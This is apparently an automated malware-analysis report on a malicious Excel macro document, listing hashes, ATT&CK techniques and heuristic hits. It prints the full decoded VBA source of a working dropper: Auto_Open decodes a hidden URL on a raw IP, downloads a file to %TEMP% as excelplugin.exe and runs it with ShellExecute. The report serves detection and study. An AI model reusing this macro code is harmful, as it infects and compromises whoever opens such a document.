Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 71090be90d83434b…

MALICIOUS

Office (OLE)

40.0 KB Created: 2014-06-18 07:16:39 Authoring application: Microsoft Excel First seen: 2015-07-16
MD5: 02b0e7a46f0078fd49d3c4a376ccc211 SHA-1: 4f1e075c2efd3b025e99e99436c208353299ec08 SHA-256: 71090be90d83434b6f1d4ef211a72e1e3ffe98e40d49ff1bbc314cda763a1609
338 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1059 Command and Scripting Interpreter

This Excel document contains VBA macros that leverage the Auto_Open function and call ShellExecute, indicating an attempt to execute arbitrary code. The document body explicitly prompts the user to enable macros, a common social engineering tactic. The embedded URL http://Motobit.cz is likely associated with the malware's infrastructure.

Heuristics 11

  • ClamAV: Doc.Macro.GenericHeuristic-5931846-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.GenericHeuristic-5931846-4
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    'Shell thefile, vbMaximizedFocus
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set lloosoddw = CreateObject(xm1)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Private Sub Auto_open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    thefile = Environ(tempe) & filee
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://Motobit.cz In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4641 bytes
SHA-256: 90c237953807587047ae6d1233dc61c0175993a9416ffd4423b430d61b7b7df2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"


#If VBA7 Then
    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal ms As LongPtr)
    
Public Declare PtrSafe Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

#Else
Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

#End If







Function KKiwiwiiww(ByVal MXjjwjwjssdx)
  'rfc1521
  '1999 Antonin Foller, Motobit Software, http://Motobit.cz
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  'remove white spaces, If any
  MXjjwjwjssdx = Replace(MXjjwjwjssdx, vbCrLf, "")
  MXjjwjwjssdx = Replace(MXjjwjwjssdx, vbTab, "")
  MXjjwjwjssdx = Replace(MXjjwjwjssdx, " ", "")
  
  'The source must consists from groups with Len of 4 chars
  dataLength = Len(MXjjwjwjssdx)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "KKiwiwiiww", "Bad Base64 string."
    Exit Function
  End If

  
  ' Now decode each group:
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    ' Each data group encodes up To 3 actual bytes.
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3
      ' Convert each character into 6 bits of data, And add it To
      ' an integer For temporary storage.  If a character is a '=', there
      ' is one fewer data byte.  (There can only be a maximum of 2 '=' In
      ' the whole string.)

      thisChar = Mid(MXjjwjwjssdx, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "KKiwiwiiww", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    
    'Hex splits the long To 6 groups with 4 bits
    nGroup = Hex(nGroup)
    
    'Add leading zeros
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    
    'Convert the 3 byte hex integer (6 chars) To 3 characters
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    
    'add numDataBytes characters To out string
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  KKiwiwiiww = sOut
End Function

Function Ododoode(ByVal Mncncne As String, ByVal mkooowe As String) As Boolean
    Dim lloosoddw As Object, i As Long, UIiiwweew As Long, dsdsdsdcfg() As Byte

    Dim xm1 As String
    Dim xm2 As String
    
    xm1 = KKiwiwiiww("TVNYTUwyLlhNTEhUVFA=")
    xm2 = KKiwiwiiww("R0VU")
    Set lloosoddw = CreateObject(xm1)
    lloosoddw.Open xm2, Mncncne, False
    lloosoddw.Send

  
    Do While lloosoddw.readyState <> 4
    DoEvents
    Loop

    dsdsdsdcfg = lloosoddw.responseBody

    UIiiwweew = FreeFile
    If Dir(mkooowe) <> "" Then Kill mkooowe
    Open mkooowe For Binary As #UIiiwweew
    Put #UIiiwweew, , dsdsdsdcfg
    Close #UIiiwweew

    Set lloosoddw = Nothing
End Function






Private Sub Auto_open()

Dim thefile As String

Dim tempe As String

tempe = KKiwiwiiww("VEVNUA==")

Dim filee As String

filee = KKiwiwiiww("XGV4Y2VscGx1Z2luLmV4ZQ==")


thefile = Environ(tempe) & filee

Dim linke As String

linke = KKiwiwiiww("aHR0cDovLzExMS45MC4xNTkuMTQvfm1pci9hYmMvdC5kYXQ=")


'MsgBox linke

Ododoode linke, thefile
'MsgBox thefile

'Shell thefile, vbMaximizedFocus

Dim abc As Integer

abc = 44 + 444 - 90

X = ShellExecute(0, "Open", thefile, "", "", 1)

End Sub



Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.